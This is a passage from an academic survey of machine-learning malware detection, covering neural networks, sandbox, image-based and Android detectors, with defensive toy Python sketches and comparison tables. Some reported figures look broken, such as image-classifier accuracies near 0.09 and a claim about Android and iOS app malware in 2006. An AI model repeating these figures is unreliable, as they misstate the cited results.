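img = bytes_to_grayscale(sample)
small = downsample(img)
print(len(img), len(img[0]), len(small), len(small[0]))  # 64 256 32 32
print(small[0][0], small[0][31])  # 3.5 251.5
```

Block averaging keeps every input byte's contribution in the down-sampled image. Simply dropping rows and columns could discard short but distinctive code regions.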

Fig. 4. Convolutional Neural Network (CNN).
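The toy example below shows the convolution-and-pooling step that CNN-based detectors apply to API call sequences, for example before the LSTM layers in [52] or the BiLSTM layers in [85]. It is a dependency-free sketch under stated assumptions. The call names, the 2-dimensional embeddings, and the hand-set kernels of width 2 are hypothetical. A real model learns these weights, and its recurrent layers would consume the convolution outputs as a sequence rather than a single pooled vector.

```python
from typing import Dict, List, Sequence

Vector = List[float]


def embed(calls: Sequence[str], table: Dict[str, Vector]) -> List[Vector]:
    """Look up one vector per API call; unknown calls map to a zero vector."""
    dim = len(next(iter(table.values())))
    return [table.get(c, [0.0] * dim) for c in calls]


def conv1d_relu(seq: List[Vector], kernels: List[List[Vector]], bias: float = 0.0) -> List[List[float]]:
    """Valid 1-D convolution: each kernel spans k consecutive calls (an n-gram window)."""
    maps = []
    for kern in kernels:
        k = len(kern)
        fmap = []
        for t in range(len(seq) - k + 1):
            s = bias
            for dt in range(k):
                s += sum(w * x for w, x in zip(kern[dt], seq[t + dt]))
            fmap.append(max(0.0, s))  # ReLU activation
        maps.append(fmap)
    return maps


def global_max_pool(maps: List[List[float]]) -> List[float]:
    """Keep the strongest response of each kernel anywhere in the sequence."""
    return [max(m) if m else 0.0 for m in maps]


# Hypothetical 2-d embeddings and hand-set kernels (a trained model learns both).
TABLE = {"OpenFile": [1.0, 0.0], "WriteFile": [0.0, 1.0], "RegSetValue": [1.0, 1.0]}
KERNELS = [
    [[1.0, 0.0], [0.0, 1.0]],    # e.g. scores 2.0 on "OpenFile -> WriteFile"
    [[-1.0, 0.0], [0.0, -1.0]],  # all-negative weights: ReLU outputs 0 for these embeddings
]

trace = ["RegSetValue", "OpenFile", "WriteFile"]
features = global_max_pool(conv1d_relu(embed(trace, TABLE), KERNELS))
print(features)  # [2.0, 0.0]
```

Each kernel acts as a learned n-gram detector over consecutive calls. Max pooling makes the response independent of where in the trace the pattern occurs.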

CNN-BiLSTM achieves better accuracy than a plain CNN. An embedding layer is incorporated into the neural network, and max pooling is applied to the convolutional layer. The convolutional layer learns n-gram signatures to detect malware opcodes [74]. The Hierarchical Convolutional Neural Network (HCNN) [13] is proposed to handle the hierarchical structure of program executables. It applies CNNs to instruction mnemonics to capture features at the function level.

4.3. Recurrent neural network

An RNN is a form of Artificial Neural Network (ANN) applied in speech recognition and natural language processing. It observes sequential events to predict the next action. The Long Short-Term Memory (LSTM) module is an RNN unit that carries information from the beginning to the end of a sequence, and it is used to avoid the vanishing gradient problem [86]. A sample RNN is depicted in Fig. 5. RNNs are employed for time-based sequential prediction, where features are taken from previous inputs [27]. They have further application areas, such as speech recognition and synthesis, robot control, machine translation, and music composition. A CNN is initially employed for chunk analysis.
For detecting malware from API call traces, RNNs with integrated LSTM and GRU (Gated Recurrent Unit) layers performed better [87]. The method has two stages. LSTM and GRU layers learn features in the first stage, and the features are classified in the second stage. In [28], sequential dependencies among API calls are modelled so that previous inputs inform the output. The vanishing gradient problem is avoided by combining four LSTM layers with the RNN. Before the CNN is trained, the RNN is applied to build a behavioural model from the data. The output of the RNN is then transformed into feature images for the CNN. RNNs are used to detect unknown malware and threats in IoT environments [88], where opcodes are used to classify malware. An SVM is further employed to assess opcodes and discover the feature set of malware, and the n-gram method enables it to reach 96% accuracy. True positive and false positive rates of malware samples are computed by applying deep learning methods, which yield 98% malware detection accuracy.
Neural networks are used to classify malware into predefined families. Convolutional and recurrent layers are analysed to model call sequences, with the output of the convolutional layer connected to the recurrent layer [52]. In [85], an LSTM-based RNN is applied on top of a CNN, and a feature vector is obtained from the entire file contents. Moreover, the input to the RNN is classified into 9 malware classes before the RNN creates the feature vector.

Fig. 5. Recurrent Neural Network (RNN).

5. Machine learning based malware detection techniques

5.1. Sandboxing based malware detection

5.1.1. Static analysis based malware detection techniques

Graph similarities are computed using a modified histogram to analyse and classify malware [89]. Experimental results show high detection accuracy. Fast malware detection based on control flow graphs (CFGs) is implemented to find malware and classify it by family [90]. Each family's signature is created with a Bloom filter, which also reduces feature complexity and hence computation cost. Features are summarized with CFGs to define the similarities. Identical block numbers, edge directions, and instruction sequences are also considered. The similarity ratio is 0.82315 for samples of the same family and 0.01970 for samples of different families. Another malware classification method extracts malware features by counting every library used by each malware sample [91]. Large numbers of malware samples are obtained from McAfee, Kaspersky, Norton, and F-Secure for authenticity. Similarities among malware families are analysed using API calls per DLL (Dynamic Link Library) and the library functions imported for the runtime environment. Euclidean distance and multi-layer perceptrons are used to classify the different malware.
Every value written to the destination registers in runtime traces is used for malware classification [92]. Complete profiling is examined to recognize the functions of each program. Trace similarity is computed with a two-step procedure based on the value sequences. Clustering is applied to group the samples, and code reuse is also taken into account. Another method differentiates malware families by converting malware programs into visualized images [93]. These images are then transformed into entropy graphs to find the similarities between malware families and to classify them.
To distinguish malware from benign Android applications, features are extracted from the apps. Explainable machine learning is used to develop a lightweight Android malware detection system named PAIRED [94]. Recursive Feature Elimination (RFE) is used to retain the minimum number of critical features. For training, 35 static features of the applications are extracted. Shapley Additive Explanation (SHAP) values are then used to explain the classifier in terms of the selected features. In the experiments, PAIRED attains more than 98% accuracy while keeping a small footprint on the device, with a False Negative rate of 0.0090. The Drebin-215 dataset is used for the experiments. Table 1 compares static analysis-based malware detection techniques using ML.

Table 1
Comparison of static analysis techniques using ML.
Research paper | Features | Type of analysis | Algorithms of classification
Alani et al. (2022) [94] | RFE, SHAP, Drebin-215 dataset | Static | PAIRED
Fang et al. (2019) [40] | PE files, RL | Static | DT, RF, SVM, DQFSA
Raff et al. (2018a) [53] | Byte sequence | Static | CNN
Davis et al. (2017) [27] | Byte sequence | Static | CNN with RNN
Ahmadi et al. (2016) [30] | Byte 1-grams, metadata features, entropy statistics, Haralick and Local Binary Pattern features, ASCII strings | Static | Ensemble of Gradient Boosting Trees
Han et al. (2015) [93] | Visualized image, entropy graphs | Static | Clustering
Annachhatre et al. (2015) [92] | Profiling functions, sequence | Static | Hidden Markov models
Gonzalez et al. (2013) [91] | API calls per DLL, library feature | Static | Euclidean distance and artificial neural networks

5.1.2. Dynamic and hybrid analysis based malware detection techniques
Dynamic analysis involves executing malware in a real-time environment or a sandbox-like virtual environment to extract features. Earlier, most traditional techniques extracted API calls from running malware processes and used them as input. One ML-based malware detection method uses Anubis (formerly TTAnalyze) to produce XML report files [41]. The dataset consists of 220 malicious samples and 250 legitimate samples. Term frequencies generated from the reports are used as the feature set. The J48 model gives good results, with a true positive rate of 96% and a false positive rate of 2.4%.
In [95], CWSandbox is used to extract the system calls of a dataset of 3133 malware samples. An N-gram feature set is built from the system call sequences, and a clustering algorithm groups malware with similar behaviour. The framework is verified on 33,698 anonymous samples and attains an F-score of 99.7%.
The Android malware classification model [96] classifies the API functions of Android apps and differentiates their sources and sinks. It also involves a flow-tracking mechanism, and malware behaviour is discovered through the sources and sinks. At the end of the analysis, precision and recall are both 92.3%. TrumanBox [97] is used to extract network features such as request count, data size, and requests received per day. These features are used to detect malicious activity in Hypertext Transfer Protocol (HTTP) request communication. Network irregularities such as tunnelling and backdoors are identified using a dataset of 695 malware samples.
Memory dumps are retrieved from the virtual environment during the execution of malicious and legitimate samples [98]. WinDbg is used to reconstruct the system calls by tracing them. A Random Forest model is tested on 16 samples: 10 malicious samples, including ransomware and Remote Access Trojans (RATs), and 6 legitimate samples. The experimental results show a true positive rate of 98% and a false positive rate of 0%. Research has also been carried out on applying Machine Learning to Side-Channel Analysis (SCA) [99], in which the cryptographic keys of cryptographic devices are extracted. Power consumption is used as the feature set. The Least Squares Support Vector Machine (LS-SVM) classifier used for classification obtains a success rate of 75%.
An online malware detection method is implemented on Android and Linux [100]. The investigation uses 210 legitimate programs and 503 malicious samples, including 2 rootkits. With different algorithms such as decision trees, a detection rate of 83% and a false positive rate of 10% are attained. EM-Based Detection of Deviations in Program Execution (EDDIE) monitors the electromagnetic emissions of IoT devices [101]. It identifies statistical irregularities in those emissions caused by the injection of malicious code into the app's runtime environment. In this way, malicious intentions can be defeated. In [80], neural networks are trained on API call features in the hidden layers. Null-terminated strings are also extracted from process memory as features. A projection technique reduces the feature dimension before the features are passed to the neural network.
A hybrid IoT botnet detection method is proposed for the Industrial IoT environment [102]. Printable String Information (PSI) rooted sub-graph features are generated during static analysis and enhanced during dynamic analysis. PSI is utilized for
traversing the static analysis-based graph, and the resulting graph-based features are useful for classifying benign and malware samples. A dataset of 83,430 executable samples is used for the experiments. Among them, 5531 are IoT botnet samples and 2799 are IoT benign samples. The hybrid method attains 98.1% detection accuracy and 91.99% classification accuracy for IoT botnets. Methods of dynamic and hybrid analysis are compared in Table 2.

Table 2
Comparison of recent dynamic and hybrid malware detection techniques using ML.
Research paper | Features | Type of analysis | Algorithms of classification
Nguyen et al. (2022) [102] | PSI rooted sub-graph features, Industrial IoT | Both static and dynamic | Hybrid botnet detection
Husainiamer et al. (2020) [103] | Mobile behaviour and vulnerability exploitation | Both static and dynamic | POC
Jeon et al. (2020) [104] | Behaviours associated with memory, process, and system call | Dynamic | DAIMD, CNN
Han et al. (2019a) [42] | Static and dynamic API sequences | Both static and dynamic | K-NN, RF, DT, Extreme Gradient Boosting
Han et al. (2019b) [43] | Section sizes of PE, DLL information, API sequences, IP, DNS, port and domain request operations | Both static and dynamic | K-NN, RF, DT, Extreme Gradient Boosting
Pektaş and Acarman (2017) [105] | File system, API call N-grams, network and registry features | Dynamic | PA-I, PA-II, CW, AROW, NHERD
Nissim et al. (2018) [98] | Memory dumps, WinDbg, RATs | Dynamic | Random Forest model
Nazari et al. (2017) [101] | EM emissions | Dynamic | EDDIE
Rasthofer et al. (2014) [96] | API functions, Android | Dynamic | Flow tracking mechanism
Demme et al. (2013) [100] | Decision tree, Android | Dynamic | Online malware detection
Hospodar et al. (2011) [99] | SCA, cryptographic keys, power consumption | Dynamic | LS-SVM
Schwenk et al. (2011) [97] | HTTP request communication, network behaviours | Dynamic | TrumanBox
Rieck et al. (2011) [95] | CWSandbox, N-gram feature set | Dynamic | Clustering algorithm
Firdausi et al. (2010) [41] | Anubis, XML reports | Dynamic | J48 model

5.1.3. Image based malware detection techniques
Malware classification has become more crucial in recent years, and it is always linked to the process of spotting newly emerging malware. Fig. 6 portrays various malware detection methods that use image processing. According to a study by Microsoft, security service providers face a challenging problem when managing vast amounts of data for malware detection [106]. Classical signature- and behaviour-based techniques fail to meet the demands of malware analysis, so more effective methods are needed [107]. The core bytecode of a program is converted into a grayscale image in which each byte is represented as a pixel. The byte sequence is then wrapped to form a two-dimensional array. Classification and clustering methods are used to extract features, and machine learning techniques are applied to them [108].
Visualization techniques simplify malware classification by adapting image processing techniques [69,108]. Grayscale images are obtained by converting malware binaries [108]. A GIST descriptor is employed to compute texture features by decomposing the images. The K-Nearest Neighbours algorithm with Euclidean distance is used for classification. To evaluate performance, bigram distributions are computed from the core data. When feature vectors of bigram distributions are considered, malware classification accuracy reaches 0.98 with a time consumption of 56 s.
NatarajImage is the first malware embedding method implemented on binary files [108]. The malware binary of a Portable Executable file is read as a sequence of 8-bit values, yielding a grayscale image vector [30]. It was found that samples from the same malware family show similar texture patterns in the NatarajImage. Despite NatarajImage's weaknesses against packing and obfuscation, it inspired further research [30,109–111]. Another embedding method, AndrewImage, uses a black-and-white image vector obtained from the hexadecimal instructions in the disassembly file for malware detection [27]. AndrewImage embeds instruction-level information and performs better than NatarajImage in terms of robustness and interpretability. The Kaggle dataset is used for malware identification in [30]. Features are extracted from raw binary files as well as disassembled files and represented as images, and an XGBoost classifier is used to classify them. The accuracy is 95.5% according to 5-fold cross-validation.
An automated framework for finding unknown malicious activity uses neural network methods such as computer vision and image classification [76]. Malware binaries are transformed into 8-bit vectors for feature extraction, and the resulting grayscale images form new training sets for an ML algorithm. The Malimg dataset is used for both the training and testing phases of classification. With the nearest centroid classifier, the results show an accuracy of 0.0856, an average training time of 0.218 s, and a testing time of 0.0211 s. The highest accuracy is obtained with random forest, i.e., 0.0916, with an average training time of 1.72 s and a testing time of 0.0063 s. With other classifiers, the accuracy is 0.0905 for perceptron, 0.087 for stochastic gradient, 0.088 for decision tree, and 0.087 for multilayer perceptron. Furthermore, classification performance is lacking for stochastic gradient and perceptron.
Besides accuracy, the time and manpower spent on feature extraction are a major concern [30,110], because they make the training and detection phases less effective.
Inspired by NatarajImage, a random forest method is introduced to classify different malware [112]. Lempel–Ziv Jaccard
10
Gopinath M. and S.C. Sethuraman Computer Science Review 47 (2023) 100529

Fig. 6. Malware detection process based on image processing.

Table 3
Comparison of recent image-based malware detection techniques using ML.
Research paper Features Type of analysis Algorithms of classification
Jeon et al. (2020) [104] Behaviour images Image-based DAIMD, CNN
Raff et al. (2017) [113] NCD Image-based LZJD
Drew et al. (2017) [114] Time consumption Image-based Strand gen sequence method
Kosmidis et al. (2017) [76] Grayscale images Malimg dataset Image-based Stochastic gradient, DT, and multilayer perceptron
Ahmadi et al. (2016) [30] Grayscale images Kaggle dataset Image-based XGBoo st
Garcia et al. (2016) [112] Grayscale images Image-based RFmethod

Distance (LZJD) is proposed for malware classification from raw data, and it performs better than Normalized Compression Distance (NCD) [113]. The strand gene sequence method classifies malware with an accuracy of 98.89% and requires minimal training time [114]. However, detection takes substantially longer for large malware samples. Table 3 compares recent image-based malware detection techniques that use Machine Learning.

5.2. Mobile malware detection

Mobile devices have become part of everyone's daily activities. Bank transactions, ticket booking, following social networks, online learning, online gaming, and many other activities are carried out on mobile devices such as smartphones, tablets, and laptops. According to the statistics, the smartphone economy is larger than that of PCs [115]. Recent approaches for defending against malware fail to provide effective security because they rely on signature-based techniques. According to a recent survey, the proposed malware detection models show a higher false-positive ratio when obfuscation techniques are taken into account. Attackers target mobile devices more eagerly than PCs because mobile devices hold more sensitive and confidential user information [9,116–118]. Moreover, smartphones are tied to SIM cards, which are used for transactions based on one-time passwords (OTPs) [119].
Based on projections of the apps downloaded by users worldwide over six months, 25% of apps are used at most once. This growing population of mobile users attracts malware authors, who write code to steal personal and banking information. Google's Play Store and Apple's App Store have, however, removed hundreds of apps over security concerns. According to the McAfee report, in 2006 the largest threat identified was malware infection of iOS and Android apps.
The Google and Apple app stores eliminate malicious apps, but a few infected apps escape the core screening process. Signature-based techniques are currently used to protect against malware attacks: the behaviour of every malware sample is checked against the anti-malware repository, in which behaviours are stored as strings. The signature-based technique has two major drawbacks. First, it is difficult and time-consuming. Second, it cannot cope with the obfuscation techniques applied by attackers [120]. Exploiting these drawbacks, malware authors apply obfuscation in an automated manner to generate many variants that exhibit similar behaviour. It therefore becomes a herculean task for anti-malware providers to address these weaknesses, while researchers focus on developing defence mechanisms against mobile malware attacks.
Malicious activities are commonly inserted into genuine applications through repackaging; nearly 86% of Android malware is produced with this technique [121,122]. The malware author modifies an app downloaded from a popular marketplace such as Google's Play Store [123] by reverse engineering it with free disassemblers such as ApkTool [124]. The malicious payloads are then integrated into the app's original code [125,126], and the attacker uploads the modified app to the marketplace. This scheme can fool legitimate users who cannot distinguish the legitimate app from the malicious one. The malicious code is deployed when the app is installed, and the intended attacks of various types are carried out. A model has been created to verify the tools used for reverse engineering Android and Apple apps, and the process of creating repackaged malware has been automated [127]. Frameworks such as DroidJack and AhMyth inject malicious payloads through GUI interfaces [128–130]. After the repackaged app is installed, the attacker is alerted that the device is compromised and uses the GUI framework to extract information from it by recording the microphone, taking images, sending messages, and reading the contacts.
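The weakness of exact signature matching against repackaged or obfuscated variants can be illustrated with a small Python sketch. It assumes that a "signature" is simply a whole-file SHA-256 digest, and it contrasts that lookup with a per-entry Jaccard similarity between two APK archives (APKs are ZIP files), which is one possible way to flag a near-copy of a known app. The helper names (`build_apk`, `entry_digests`, `looks_repackaged`) and the 0.6 threshold are hypothetical choices for illustration only; this is not the method of any work cited here, and real repackaging often also changes the manifest and the signing files under META-INF.

```python
import hashlib
import io
import zipfile


def sha256_digest(data: bytes) -> str:
    """Hex SHA-256 digest of raw bytes (a simple whole-file 'signature')."""
    return hashlib.sha256(data).hexdigest()


def signature_match(sample: bytes, repository: set[str]) -> bool:
    """Signature-based check: flag the sample only if its exact digest is known."""
    return sha256_digest(sample) in repository


def build_apk(entries: dict[str, bytes]) -> bytes:
    """Build a toy in-memory ZIP archive standing in for an APK (hypothetical helper)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def entry_digests(apk_bytes: bytes) -> set[str]:
    """Digest each archive entry as 'name:sha256' so unchanged files still match."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        return {f"{name}:{sha256_digest(zf.read(name))}" for name in zf.namelist()}


def jaccard(a: set[str], b: set[str]) -> float:
    """Jaccard similarity |A & B| / |A | B|; defined as 1.0 for two empty sets."""
    if not a and not b:
        return 1.0
    return len(a & b) / len(a | b)


def looks_repackaged(candidate: bytes, original: bytes, threshold: float = 0.6) -> bool:
    """Hypothetical heuristic: content mostly shared with a known app, but not identical."""
    sim = jaccard(entry_digests(candidate), entry_digests(original))
    return threshold <= sim < 1.0


if __name__ == "__main__":
    resources = {f"res/layout_{i}.xml": f"<layout id='{i}'/>".encode() for i in range(6)}
    original = build_apk({"AndroidManifest.xml": b"<manifest/>", "classes.dex": b"dex-v1", **resources})
    repackaged = build_apk({
        "AndroidManifest.xml": b"<manifest/>",
        "classes.dex": b"dex-v1+injected-payload",  # modified code
        "assets/payload.bin": b"\x90" * 16,          # added payload
        **resources,
    })
    repo = {sha256_digest(repackaged)}   # signature of one known variant
    variant = repackaged + b"\x00"       # trivially altered copy
    print(signature_match(repackaged, repo))  # True
    print(signature_match(variant, repo))     # False
    print(round(jaccard(entry_digests(repackaged), entry_digests(original)), 2))  # 0.7
    print(looks_repackaged(repackaged, original))  # True
```

A single appended byte is enough to defeat the exact-digest lookup, whereas the entry-level comparison still reports that 7 of the 10 distinct entries are shared with the legitimate app. A practical detector would need features that survive recompression, re-signing, and code obfuscation.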

Mobile OS providers seek solutions to this relentless flood of malware by monitoring malware-affected users. Google, which has been entrusted with this role, is required to perform deep scanning of each new app made available in the Play Store in order to find nefarious actions. Newly developed apps must be submitted to Bouncer [131], an automated scanning system introduced in 2012 with the following typical features:

• Static analysis to search for known vulnerabilities
• Behaviour identification by executing and analysing the app in a virtual emulator (QEMU)
• 5 min of tracking the behaviour of the app
• Investigation of each button of the app

For static analysis, Bouncer relies on anti-malware services such as VirusTotal, which scans with 60 different anti-malware engines. With signature-based techniques, a malicious sample is discovered only if its signature is already in the repository, so the approach is ineffective against zero-day threats [132,133]. During dynamic analysis, the application is executed for a time limit of 5 min, and the app may not disclose its malicious behaviour within this period. Moreover, malware can detect when it is running in a virtual environment and adapt its activity to evade the sandbox's detection [134]. Android and iOS malware detection and mitigation techniques are explained in detail below.

5.2.1. Android malware detection techniques

Since 2019, Android has been the most dangerous OS [5,135,136]. Android malware continues to evolve at a rapid rate, extending a four-year trend, and its development first peaked in mid-2016. Because of its security breaches, Android remains in first place among infected operating systems, with the highest number of vulnerabilities. According to the CVE (Common Vulnerabilities and Exposures) database, over 417 security leak scenarios were recorded in 2019.
Trojans accounted for the major part of the Android malware distributed in 2019, precisely 93.93%. The Android Trojan ‘‘Hiddad’’, an advertising specialist, was one of the top 10 Android malware of 2019, climbing from 8th to 2nd place compared with the previous year with an 18.7% infection share. It confuses users and disables security software while concealed in other Google Play Store apps. Ransomware, ranked second among the top 10 Android malware types in 2019, aims to extort money from legitimate users, who consequently fall victim to the attackers. Because mobile devices are used more extensively than PCs and notebooks, the economic damage also increases. Most ransomware blocks the device, targeting features such as the camera and backups. More than 78k new Android ransomware samples were found in 2019.
Android password Trojans, which target online banking and shopping environments, rank third. Cyber attackers skim login credentials and target multiple user accounts because these apps lack security features. Despite updates and upgrades to Android versions, it remains a well-suited environment for illegal cyber businesses. In static analysis, the application and its disassembled code are analysed to extract features. In dynamic analysis, the behaviour of the application is investigated at run time. Hybrid analysis techniques analyse the behaviour of an application both before and after execution; combining the two resolves the individual flaws of static and dynamic analysis.
AndroDialysis [39] is a classification model based on Android intents. It concentrates on intents, the runtime-binding messaging system used by application processes, mined from malicious code, and its performance is evaluated with a Bayesian network using K-fold cross-validation. When permissions are used, an improved detection ratio is attained [137]. Static analysis methods cannot infect the device, as they gather information without executing the app, even in a restricted environment; however, static methods cannot overcome code obfuscation techniques [130,133,138–140]. Epicc [141] builds a pattern for each source and destination of Inter-Component Communication (ICC) that includes numerous factors, such as the location of the ICC, its source and destination, ICC operations, data type, and other useful information for analysis. FlowDroid [142] also performs ICC analysis over the code and configuration files of the application under test, which reduces false positives. Other methods classify malware using features collected from both static and dynamic analysis to evaluate the malicious behaviour of Android applications [143].
In [144], Machine Learning methods are applied for classification with a feature set obtained through both static and dynamic analysis of known malicious and non-malicious applications. The BRIDEMAID framework uses dynamic analysis to detect malicious behaviour at execution time, with multiple levels of monitoring over devices, applications, and user behaviours [145]. The Andromaly framework [146] considers only dynamic features for classification. It is a host-based malware detection system that monitors features such as CPU (Central Processing Unit) usage, the number of packets sent over the network, the number of running processes, and the battery level, as well as events captured from the mobile device during execution. In [147], malicious apps are analysed in a sandbox that combines static and dynamic methods: the application is executed in the sandbox environment, and hazardous events such as file-open operations and remote server connections are investigated. A denial-of-service process is implemented to evaluate the method, using a sample application that launches an external binary and creates sub-processes in an infinite loop.
Several proposed techniques use power consumption as a feature for distinguishing malicious from legitimate mobile apps. The work in [148] assumes a strong association between the power-consumption pattern of mobile devices and locality. Power-consumption data from 20 smartphones are analysed over three months, and a Nokia 5500 mobile is used to assess mobile malware in a real-time environment. The Jackdaw tool correlates control-flow and data-flow information obtained from binary files, using both static and dynamic analysis [149]. This hybrid analysis helps discover groups of API calls associated with high-level actions. Evaluation is carried out on 2136 distinct binary samples, both legitimate and malicious.
TaintDroid [150] is an extension of the Android OS that traces the flow of privacy-sensitive information through third-party apps, which may be downloaded malware. It also monitors, in real time, how applications access and manipulate users' data. The work in [151] uses predefined patterns to detect suspicious temporal patterns that indicate intrusion, also considering features such as memory demand, CPU usage, and keyboard usage. Its dataset is derived from developing and running five infected Android apps. DroidRanger [152] is a behaviour- and heuristic-based approach to Android malware detection. It was evaluated on 204,040 apps from 5 distinct Android markets between May 2011 and June 2011. Among those apps, 211 malicious apps are

effectively detected, and two sophisticated zero-day malware with 40 samples are discovered, 11 of which come from a legitimate market.
SmartDroid [153] detects Android malware by automatically exercising the user-interface interactions of Android apps. It applies hybrid analysis to expose the UI-related trigger conditions of Android apps: activity and function-call graphs are analysed statically to extract activity paths as features, and dynamic analysis traces the UI elements. Andrubis [154] is a free, fully automated system for analysing Android applications. It applies hybrid analysis techniques at both the Dalvik VM level and the system level. Its dataset, obtained by examining more than one million (10 lakh) Android applications, 40% of which are malicious, characterizes recent malware behaviours.
Mobile-Sandbox [155] is an automatic analysis system for Android applications that uses static and dynamic analysis techniques. In static analysis, the manifest of the application is parsed and the app is decompiled; in dynamic analysis, every action performed through API calls is recorded. Machine Learning techniques are then applied to the results of both analyses. Evaluation is done on more than 69,000 apps. In [156], supervised and unsupervised learning approaches are applied to detect the moment at which applications reveal malicious behaviour. Unlike previous works, it employs a visualization component. Various static analysis methods have also been proposed to detect the interaction patterns between application modules and privacy leaks.
An image-based method [157] detects Android malware from executable binaries, separating malicious apps from legitimate ones. It uses textural image classification to extract micro-level patterns from the images. In [158], music information retrieval techniques are applied to executable files to distinguish malicious from legitimate apps: the executables are converted into audio, and the features extracted from the resulting audio signals form the feature set. Machine Learning algorithms are then applied, and their performance with these audio-derived feature vectors is examined.
A reinforcement learning-based Android malware detection model is proposed to combat adversarial attacks [159]. Based on evasion attacks, single-policy and multi-policy attacks are proposed for the complete-knowledge and limited-knowledge scenarios, respectively. Four conventional classifier types are used: traditional ML, bagging, boosting, and deep neural networks. According to the experimental results, the single-policy attack achieved a 90% fooling rate with 10% modification, while the multi-policy attack achieved a 95% fooling rate with 10% modification.
Because finding features that distinguish malware distinctively is difficult with Machine Learning techniques, the method in [160] detects Android malware by extracting malicious system call codes from the typical system call sequences generated by applications, based on the occurrence of those codes. System call sequences are represented as first-order ergodic Markov chains. An accuracy of about 0.95 is obtained on both balanced and unbalanced datasets. Precision is above 0.90 for balanced and slightly unbalanced datasets but drops to 0.72 for highly unbalanced datasets.
HAWK [161] is a malware variant detection framework proposed to address the malicious issues of current Android applications. A Heterogeneous Information Network (HIN) is modelled by combining Android entities and the relationships among their behaviours. To handle the dynamics of applications, an incremental learning model is built that does not need to rebuild the complete HIN and the subsequent embedding model. Instead, the proximity between new and existing applications is identified quickly, and the numerical embeddings of different semantics are aggregated. In the experiments, 80,860 malicious and 100,375 benign application samples are investigated. HAWK achieved the highest detection accuracy, taking only 3.5 ms to detect an application sample, and its incremental training is 50 times faster than that of existing methods.
SEDMDroid [47] is an enhanced stacking-ensemble framework for Android malware detection. Random feature subspace and bootstrap sampling techniques are adopted to generate subsets, and Principal Component Analysis (PCA) is applied to every subset. Accuracy is preserved by keeping all principal components and using the whole dataset to train every MLP base learner. An SVM is then used as the fusion classifier that learns from the base learners and predicts the result. In the experiments, SEDMDroid achieved 89.07% accuracy on a dataset of multi-level static features, such as permissions, sensitive APIs, and monitored system events, and 94.92% accuracy on a large public dataset.
Fast Android Malware Detector (FAMD) [162] aims at fast malware detection by combining various features. First, the original feature set is created by extracting permissions and Dalvik opcode sequences, and the Dalvik opcodes are pre-processed with the N-gram approach. Next, the feature dimensionality is reduced with the symmetrical uncertainty-based FCBF (Fast Correlation-Based Filter) algorithm. Finally, the reduced features are fed to a CatBoost classifier that detects and classifies malware. Experiments on the Drebin dataset yield improved detection and classification accuracies of 97.40% and 97.38%, respectively.
GDroid [163] uses a Graph Convolutional Network (GCN) to detect Android malware and classify it into families. Apps and Android APIs are mapped into one large heterogeneous graph, which converts the original problem into a node classification task. Edges of type ‘‘App-API’’ and ‘‘API-API’’ are built from invocation relationships and API usage patterns. The heterogeneous graph is then fed to the GCN model, which generates node representations by incorporating the topological structure and node features. In the experiments, GDroid achieved a detection accuracy of 98.99% with a false-positive rate below 1%, and an average accuracy of 97% for malware family classification.
ProDroid [164] is a behavioural Android malware detection and classification model based on profile hidden Markov models. The Android malware dataset is decompiled to create an encoded list of suspicious API classes and methods. The encoded patterns are used to build multiple sequence alignments for various malware families, from which profile hidden Markov models are generated. The model then classifies unknown applications as benign or malicious according to their log-likelihood scores. ProDroid attains an accuracy of 94.5%, which is higher than that of existing frameworks.
The work in [165] proposes an Android malware detection solution based on Semantic Distance based API Clustering (SDAC). The value of new APIs for malware detection is assessed on the basis of the existing API clusters. A single neural network maps the APIs in sequences to vectors, and discrepancies across API vectors are treated as semantic distances. API clusters and classification models are updated on the basis of labelled training data and pseudo-labelled test

data. Performance evaluation is carried out on 70k Android app samples collected over a five-year period. The results show that SDAC attains a 97.49% F-score and ages slowly, with only a 0.11% reduction in F-score.
A Contrastive Learning-based strategy is proposed to identify and categorize Android malware [166]; it supports model pre-training without labels and reduces the dependence on prior knowledge. According to the results, it attains more than 96% malware detection accuracy on the public dataset and more than 98% accuracy for malware class and family classification. HamDroid [167] detects hazardous fake Android anti-malware apps from static permissions and applications using MLP (Multi-Layer Perceptron) neural networks. A new dataset of harmful and benign Android anti-malware applications is collected with VirusTotal and used to train and evaluate the MLP networks. Because permissions are extracted from manifest files before the anti-malware app is installed, HamDroid appears feasible in practice. Experiments yielded 98.62% accuracy, 95.56% precision, 97.73% recall, and a 96.63% F1-score.
MSerNetDroid [168] is an Android malware detection framework that uses a multi-head squeeze-and-excitation residual network to extract features from manifest-file permissions, API calls, and hardware features for app classification. Its Multi-Head Squeeze-and-Excitation Residual block (MSer) architecture is designed to learn essential correlations between features. The framework is evaluated on 2126 malware apps and 1061 benign apps obtained from VirusShare and the Google Play Store, and the experimental outcomes show that it achieves 96.48% accuracy. Recently implemented Android malware detection techniques that use ML are summarized in Table 4.

Table 4
Comparison of recent Android mobile malware detection techniques using ML.
Research paper | Features | Type of malware | Algorithms of classification
Zhu et al. (2023) [168] | Multi-head squeeze-and-excitation residual network, API calls and hardware features | Android | MSerNetDroid
Seraj et al. (2022) [167] | MLP, fake Android anti-malware, static permissions and applications | Android | HamDroid
Yang et al. (2022) [166] | Past knowledge, model pre-training | Android | Contrastive Learning
Xu et al. (2022) [165] | Semantic distance-based API clustering, API vectors | Android | SDAC
Kumar Sasidharan et al. (2021) [164] | Profile hidden Markov model, encoded patterns, log-likelihood score | Android | ProDroid
Bai et al. (2020) [162] | Permissions and Dalvik opcode sequences, N-Gram technique, FCBF, CatBoost classifier | Android | FAMD
Zhu et al. (2020) [47] | Random feature subspace and bootstrapping samples techniques, PCA, MLP, SVM | Android | SEDMDroid
Hei et al. (2021) [161] | Behaviours | Android | HAWK
Surendran et al. (2021) [160] | System call codes, system call | Android | Ergodic Markov chain, system call sequence pattern analysis
Rathore et al. (2021) [159] | Single policy and multi policy | Android | Traditional ML, bagging, boosting and deep neural network
Hashemi et al. (2019) [157] | Micropatterns | Android | Textural image classification
Farrokhmanesh et al. (2019) [158] | Audio files | Android | Music Information Retrieval
Feizollah et al. (2017) [39] | Messages, Bayesian Network | Android | AndroDialysis
Faiella et al. (2017) [145] | Behaviours of users | Android | BRIDEMAID
Ferrante et al. (2016) [156] | Change in environment | Android | Supervised and unsupervised
Lindorfer et al. (2015) [143] | Behaviour | Android | ML methods
Polino et al. (2015) [149] | API calls groups | Android | Jackdaw tool
Lindorfer et al. (2014) [154] | Malware behaviours | Android | Andrubis
